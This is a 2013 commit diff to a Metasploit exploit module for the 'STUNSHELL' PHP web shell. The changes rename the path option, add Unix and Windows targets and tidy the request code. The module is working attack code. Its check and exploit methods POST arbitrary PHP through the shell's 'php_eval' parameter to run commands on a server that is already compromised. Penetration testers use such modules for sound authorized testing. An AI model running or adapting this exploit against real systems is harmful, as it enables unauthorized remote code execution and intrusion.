Renamed and fixed some code issues

bwall · bwall · commit 2a60ef2d60e3 · 2013-03-27T17:14:41.000-04:00
diff --git a/modules/exploits/multi/http/stunshell_eval.rb b/modules/exploits/multi/http/stunshell_eval.rb
@@ -8,14 +8,15 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => '"STUNSHELL" Web Shell Remote Code Execution(PHP eval)',
+			'Name'           => 'STUNSHELL Web Shell Remote Code Execution(PHP eval)',
 			'Description'    => %q{
-				This module exploits unauthenticated versions of the "STUNSHELL" web shell.  This
+					his module exploits unauthenticated versions of the "STUNSHELL" web shell.  This
 				module works when safe mode is enabled on the web server.  This shell is widely
 				used in automated RFI payloads.
 			},
@@ -27,7 +28,7 @@ module works when safe mode is enabled on the web server.  This shell is widely
 			'References'     =>
 				[
 					['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'],
-					['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007'],
+					['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007']
 				],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -38,22 +39,26 @@ module works when safe mode is enabled on the web server.  This shell is widely
 				},
 			'Platform'       => ['php'],
 			'Arch'           => ARCH_PHP,
-			'Targets'        => [['Automatic',{}]],
+			'Targets'        => 
+				[
+					['stunshell / Unix', { 'Platform' => 'unix' } ],
+					['stunshell / Windows', { 'Platform' => 'win' } ]
+				],
 			'DisclosureDate' => 'Mar 23 2013',
 			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				OptString.new('URI',[true, "The path to the andalas_oku shell", "/"]),
+				OptString.new('TARGETURI',[true, "The path to the andalas_oku shell", "/IDC.php"]),
 			],self.class)
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
+		uri = normalize_uri(target_uri.path.to_s)
 		request_parameters = {
-			'method'    => 'POST',
-			'uri'       => uri,
-			'vars_post' =>
+			'method'	=> 'POST',
+			'uri'		=> uri,
+			'vars_post'	=>
 				{
 					'cmd' => "php_eval",
 					'php_eval' => "print 'andalas_oku test parameter';"
@@ -66,12 +71,12 @@ def check
 		return Exploit::CheckCode::Safe
 	end
 
-	def http_send_command(cmd, opts = {})
-		uri = normalize_uri(datastore['URI'])
+	def http_send_command(cmd)
+		uri = normalize_uri(target_uri.path.to_s)
 		request_parameters = {
-			'method'    => 'POST',
-			'uri'       => uri,
-			'vars_post' =>
+			'method'	=> 'POST',
+			'uri'		=> uri,
+			'vars_post'	=>
 				{
 					'cmd' => "php_eval",
 					"php_eval" => cmd
@@ -80,10 +85,6 @@ def http_send_command(cmd, opts = {})
 		res = send_request_cgi(request_parameters)
 	end
 
-	def execute_command(cmd, opts = {})
-		http_send_command("#{cmd}")
-	end
-
 	def exploit
 		http_send_command(payload.encoded)
 	end
